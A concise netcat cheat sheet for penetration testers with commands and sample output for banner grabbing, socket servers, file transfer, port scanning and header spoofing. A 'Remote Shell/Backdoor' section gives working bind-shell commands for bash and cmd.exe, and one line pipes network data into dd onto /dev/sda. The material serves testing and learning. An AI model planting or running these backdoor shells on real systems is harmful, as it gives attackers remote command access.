NetCat CheatSheet for Pentesters

The Concise NetCat CheatSheet for Pentesters

This cheatsheet was put together in response to an increasing prevalence of ‘cheatsheets’ so vast in size that they might as well be labelled “extended help”. This article will be updated with cool stuff over time. 

Netcat Telnet

$ nc -v google.com 80
 Connection to google.com 80 port [tcp/http] succeeded!
 GET index.html HTTP/1.1

 HTTP/1.1 302 Found
 Location: http://www.google.com/
 Cache-Control: private
 Content-Type: text/html; charset=UTF-8
 X-Content-Type-Options: nosniff
 Date: Sat, 18 Aug 2012 06:03:04 GMT
 Server: sffe
 Content-Length: 219
X-XSS-Protection: 1; mode=block

 <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
 <TITLE>302 Moved</TITLE></HEAD><BODY>
 <H1>302 Moved</H1>
 The document has moved
 <A HREF="http://www.google.com/">here</A>.
 </BODY></HTML>

Netcat Simple Socket Servers

$ nc -l -v 1234
$ telnet localhost 1234
 Trying 127.0.0.1...
 Connected to localhost.
 Escape character is '^]'.
 abc
 ting tongserver

After connecting we send some test message like abc and ting tong to the netcat socket server. The netcat socket server will echo the data received from the telnet client.

$ nc -l -v 5555
 Connection from 127.0.0.1 port 5555 [tcp/rplay] accepted
 abc
 ting tong 

Complete ECHO Server

 $ ncat -v -l -p 5555 -c 'while true; do read i && echo [echo] $i; done
 $ nc -l -v 1234 > data.txt

UDP Server

$ nc -v -ul 7000

Connect to this server using netcat from another terminal

$ nc localhost -u 7000
$ netstat | grep 7000
udp     0    0 localhost:42634      localhost:7000        ESTABLISHED

Netcat File transfer

One machine A – Send File

$ cat happy.txt | ncat -v -l -p 5555
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:5555

On machine B – Receive File

$ ncat localhost 5555 > happy_copy.txt

Netcat Port Scanning

$ nc -v -n -z -w 1 192.168.1.2 75-85
 nc: connect to 192.168.1.2 port 75 (tcp) failed: Connection refused
 nc: connect to 192.168.1.2 port 76 (tcp) failed: Connection refused
 nc: connect to 192.168.1.2 port 77 (tcp) failed: Connection refused
 nc: connect to 192.168.1.2 port 78 (tcp) failed: Connection refused
 nc: connect to 192.168.1.2 port 79 (tcp) failed: Connection refused
 Connection to 192.168.1.2 80 port [tcp/*] succeeded!
 nc: connect to 192.168.1.2 port 81 (tcp) failed: Connection refused
 nc: connect to 192.168.1.2 port 82 (tcp) failed: Connection refused
 nc: connect to 192.168.1.2 port 83 (tcp) failed: Connection refused
 nc: connect to 192.168.1.2 port 84 (tcp) failed: Connection refused
 nc: connect to 192.168.1.2 port 85 (tcp) failed: Connection refused

Netcat Linux Remote Shell/Backdoor

$ ncat -v -l -p 7777 -e /bin/bash

Connect to this bash shell using nc from another terminal

$ nc localhost 7777

Netcat Windows Remote Shell/Backdoor

C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exe
 listening on [any] 8888 ...
 connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 1182

Netcat Cloning Hard Drives & Partition

 $ nc -l -p 1234 | dd of=/dev/sda

Netcat as a Webserver

 $ while true; do nc -l -p 80 -q 1 < somepage.html; done

NETCAT Spoofing HTTP Headers

You can use netcat to request web pages:

nc ispconfig.org 80

You can then type in headers as follows:

 GET / HTTP/1.1
 Host: ispconfig.org
 Referrer: mypage.com
 User-Agent: my-browser

 server2:~# nc exampple.com 80
 GET / HTTP/1.1
 Host: example.com 
 Referrer: mypage.com
 User-Agent: my-browser

 HTTP/1.1 200 OK
 Date: Fri, 28 Nov 2008 14:11:49 GMT
 Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8c
 Last-Modified: Wed, 26 Nov 2008 19:34:17 GMT
 ETag: "228c707-21b1-b6b7e040"
 Accept-Ranges: bytes
 Content-Length: 8625
 Content-Type: text/html
 [...]

Netcat Timeouts

Server :

nc -l 2389

Client :

$ nc -w 10 localhost 2389

Netcat IPV6 Connectivity

Server :

$ nc -4 -l 2389

Client :

$ nc -4 localhost 2389

Now, if we run the netstat command, we see :

$ netstat | grep 2389
tcp      0   0 localhost:2389       localhost:50851       ESTABLISHED
 tcp      0   0 localhost:50851      localhost:2389        ESTABLISHED

Now, If we force nc to use IPV6 addresses –

Server :

$ nc -6 -l 2389

Client :

$ nc -6 localhost 2389

Now, if we run the netstat command, we see :

$ netstat | grep 2389

tcp6     0   0 localhost:2389        localhost:33234      ESTABLISHED
tcp6     0   0 localhost:33234       localhost:2389       ESTABLISHED

Force Netcat Server to Stay Up

This behaviour can be controlled by using the -k flag at the server side to force the server to stay up even after the client has disconnected.

$ nc -k -l 2389

Configure Netcat Client to Stay Up after EOF

 $ nc  -q 5  localhost 2389